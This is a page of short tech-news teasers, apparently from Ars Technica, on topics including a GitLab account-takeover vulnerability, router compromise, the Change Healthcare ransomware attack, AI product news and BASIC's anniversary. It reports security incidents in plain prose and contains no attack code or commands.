Category:

Editor’s Pick

Enlarge (credit: Getty Images)

On Thursday, renowned AI researcher Andrej Karpathy, formerly of OpenAI and Tesla, tweeted a lighthearted proposal that large language models (LLMs) like the one that runs ChatGPT could one day be modified to operate in or be transmitted to space, potentially to communicate with extraterrestrial life. He said the idea was “just for fun,” but with his influential profile in the field, the idea may inspire others in the future.

Karpathy’s bona fides in AI almost speak for themselves, receiving a PhD from Stanford under computer scientist Dr. Fei-Fei Li in 2015. He then became one of the founding members of OpenAI as a research scientist, then served as senior director of AI at Tesla between 2017 and 2022. In 2023, Karpathy rejoined OpenAI for a year, leaving this past February. He’s posted several highly regarded tutorials covering AI concepts on YouTube, and whenever he talks about AI, people listen.

Most recently, Karpathy has been working on a project called “llm.c” that implements the training process for OpenAI’s 2019 GPT-2 LLM in pure C, dramatically speeding up the process and demonstrating that working with LLMs doesn’t necessarily require complex development environments. The project’s streamlined approach and concise codebase sparked Karpathy’s imagination.

Read 20 remaining paragraphs | Comments

0 comment
0 FacebookTwitterPinterestEmail

Enlarge

A maximum severity vulnerability that allows hackers to hijack GitLab accounts with no user interaction required is now under active exploitation, federal government officials warned as data showed that thousands of users had yet to install a patch released in January.

A change GitLab implemented in May 2023 made it possible for users to initiate password changes through links sent to secondary email addresses. The move was designed to permit resets when users didn’t have access to the email address used to establish the account. In January, GitLab disclosed that the feature allowed attackers to send reset emails to accounts they controlled and from there click on the embedded link and take over the account.

While exploits require no user interaction, hijackings worke only against accounts that aren’t configured to use multi-factor authentication. Even with MFA, accounts remained vulnerable to password resets, but the attackers ultimately are unable to access the account, allowing the rightful owner to change the reset password. The vulnerability, tracked as CVE-2023-7028, carries a severity rating of 10 out of a possible 10.

Read 9 remaining paragraphs | Comments

0 comment
0 FacebookTwitterPinterestEmail

Enlarge (credit: Aurich Lawson / Ars Technica)

Cybercriminals and spies working for nation-states are surreptitiously coexisting inside the same compromised name-brand routers as they use the devices to disguise attacks motivated both by financial gain and strategic espionage, researchers said.

In some cases, the coexistence is peaceful, as financially motivated hackers provide spies with access to already compromised routers in exchange for a fee, researchers from security firm Trend Micro reported Wednesday. In other cases, hackers working in nation-state-backed advanced persistent threat groups take control of devices previously hacked by the cybercrime groups. Sometimes the devices are independently compromised multiple times by different groups. The result is a free-for-all inside routers and, to a lesser extent, VPN devices and virtual private servers provided by hosting companies.

“Cybercriminals and Advanced Persistent Threat (APT) actors share a common interest in proxy anonymization layers and Virtual Private Network (VPN) nodes to hide traces of their presence and make detection of malicious activities more difficult,” Trend Micro researchers Feike Hacquebord and Fernando Merces wrote. “This shared interest results in malicious internet traffic blending financial and espionage motives.”

Read 13 remaining paragraphs | Comments

0 comment
0 FacebookTwitterPinterestEmail

Enlarge / The Claude AI iOS app running on an iPhone. (credit: Anthropic)

On Wednesday, Anthropic announced the launch of an iOS mobile app for its Claude 3 AI language models that are similar to OpenAI’s ChatGPT. It also introduced a new subscription tier designed for group collaboration. Before the app launch, Claude was only available through a website, an API, and other apps that integrated Claude through API.

Like the ChatGPT app, Claude’s new mobile app serves as a gateway to chatbot interactions, and it also allows uploading photos for analysis. While it’s only available on Apple devices for now, Anthropic says that an Android app is coming soon.

Anthropic rolled out the Claude 3 large language model (LLM) family in March, featuring three different model sizes: Claude Opus, Claude Sonnet, and Claude Haiku. Currently, the app utilizes Sonnet for regular users and Opus for Pro users.

Read 3 remaining paragraphs | Comments

0 comment
0 FacebookTwitterPinterestEmail

Enlarge / Part of the cover illustration from “The Applesoft Tutorial” BASIC manual that shipped with the Apple II computer starting in 1981. (credit: Apple, Inc.)

Sixty years ago, on May 1, 1964, at 4 am in the morning, a quiet revolution in computing began at Dartmouth College. That’s when mathematicians John G. Kemeny and Thomas E. Kurtz successfully ran the first program written in their newly developed BASIC (Beginner’s All-Purpose Symbolic Instruction Code) programming language on the college’s General Electric GE-225 mainframe.

Little did they know that their creation would go on to democratize computing and inspire generations of programmers over the next six decades.

What is BASIC?

In its most traditional form, BASIC is an interpreted programming language that runs line by line, with line numbers. A typical program might look something like this:

Read 13 remaining paragraphs | Comments

0 comment
0 FacebookTwitterPinterestEmail

Enlarge / A photo of the Cheyenne supercomputer, which is now up for auction. (credit: US General Services Administration)

On Tuesday, the US General Services Administration began an auction for the decommissioned Cheyenne supercomputer, located in Cheyenne, Wyoming. The 5.34-petaflop supercomputer ranked as the 20th most powerful in the world at the time of its installation in 2016. Bidding started at $2,500, but it’s price is currently $27,643 with the reserve not yet met.

The supercomputer, which officially operated between January 12, 2017, and December 31, 2023, at the NCAR-Wyoming Supercomputing Center, was a powerful and energy-efficient system that significantly advanced atmospheric and Earth system sciences research.

“In its lifetime, Cheyenne delivered over 7 billion core-hours, served over 4,400 users, and supported nearly 1,300 NSF awards,” writes the University Corporation for Atmospheric Research (UCAR) on its official Cheyenne information page. “It played a key role in education, supporting more than 80 university courses and training events. Nearly 1,000 projects were awarded for early-career graduate students and postdocs. Perhaps most tellingly, Cheyenne-powered research generated over 4,500 peer-review publications, dissertations and theses, and other works.”

Read 5 remaining paragraphs | Comments

0 comment
0 FacebookTwitterPinterestEmail

Enlarge (credit: Getty Images)

Change Healthcare, the health care services provider that recently experienced a ransomware attack that hamstrung the US prescription market for two weeks, was hacked through a compromised account that failed to use multifactor authentication, the company CEO told members of Congress.

The February 21 attack by a ransomware group using the names ALPHV or BlackCat took down a nationwide network Change Healthcare administers to allow healthcare providers to manage customer payments and insurance claims. With no easy way for pharmacies to calculate what costs were covered by insurance companies, payment processors, providers, and patients experienced long delays in filling prescriptions for medicines, many of which were lifesaving. Change Healthcare has also reported that hackers behind the attacks obtained personal health information for a “substantial portion” of the US population.

Standard defense not in place

Andrew Witty, CEO of Change Healthcare parent company UnitedHealth Group, said the breach started on February 12 when hackers somehow obtained an account password for a portal allowing remote access to employee desktop devices. The account, Witty admitted, failed to use multifactor authentication (MFA), a standard defense against password compromises that requires additional authentication in the form of a one-time password or physical security key.

Read 8 remaining paragraphs | Comments

0 comment
0 FacebookTwitterPinterestEmail

Enlarge / Be careful with the buckets you put out there for anybody to fill. (credit: Getty Images)

If you’re using Amazon Web Services and your S3 storage bucket can be reached from the open web, you’d do well not to pick a generic name for that space. Avoid “example,” skip “change_me,” don’t even go with “foo” or “bar.” Someone else with the same “change this later” thinking can cost you a MacBook’s worth of cash.

Ask Maciej Pocwierz, who just happened to pick an S3 name that “one of the popular open-source tools” used for its default backup configuration. After setting up the bucket for a client project, he checked his billing page and found nearly 100 million unauthorized attempts to create new files on his bucket (PUT requests) within one day. The bill was over $1,300 and counting.

Nothing, nothing, nothing, nothing, nothing … nearly 100 million unauthorized requests. (credit: Maciej Pocwierz)

“All this actually happened just a few days after I ensured my client that the price for AWS services will be negligible, like $20 at most for the entire month,” Pocwierz wrote over chat. “I explained the situation is very unusual but it definitely looked as if I didn’t know what I’m doing.”

Read 5 remaining paragraphs | Comments

0 comment
0 FacebookTwitterPinterestEmail

Enlarge (credit: Getty Images)

On Sunday, word began to spread on social media about a new mystery chatbot named “gpt2-chatbot” that appeared in the LMSYS Chatbot Arena. Some people speculate that it may be a secret test version of OpenAI’s upcoming GPT-4.5 or GPT-5 large language model (LLM). The paid version of ChatGPT is currently powered by GPT-4 Turbo.

Currently, the new model is only available for use through the Chatbot Arena website, although in a limited way. In the site’s “side-by-side” arena mode where users can purposely select the model, gpt2-chatbot has a rate limit of eight queries per day—dramatically limiting people’s ability to test it in detail.

So far, gpt2-chatbot has inspired plenty of rumors online, including that it could be the stealth launch of a test version of GPT-4.5 or even GPT-5—or perhaps a new version of 2019’s GPT-2 that has been trained using new techniques. We reached out to OpenAI for comment but did not receive a response by press time. On Monday evening, OpenAI CEO Sam Altman seemingly dropped a hint by tweeting, “i do have a soft spot for gpt2.”

Read 14 remaining paragraphs | Comments

0 comment
0 FacebookTwitterPinterestEmail

Enlarge (credit: Benj Edwards | Getty Images)

On Friday, the US Department of Homeland Security announced the formation of an Artificial Intelligence Safety and Security Board that consists of 22 members pulled from the tech industry, government, academia, and civil rights organizations. But given the nebulous nature of the term “AI,” which can apply to a broad spectrum of computer technology, it’s unclear if this group will even be able to agree on what exactly they are safeguarding us from.

President Biden directed DHS Secretary Alejandro Mayorkas to establish the board, which will meet for the first time in early May and subsequently on a quarterly basis.

The fundamental assumption posed by the board’s existence, and reflected in Biden’s AI executive order from October, is that AI is an inherently risky technology and that American citizens and businesses need to be protected from its misuse. Along those lines, the goal of the group is to help guard against foreign adversaries using AI to disrupt US infrastructure; develop recommendations to ensure the safe adoption of AI tech into transportation, energy, and Internet services; foster cross-sector collaboration between government and businesses; and create a forum where AI leaders to share information on AI security risks with the DHS.

Read 13 remaining paragraphs | Comments

0 comment
0 FacebookTwitterPinterestEmail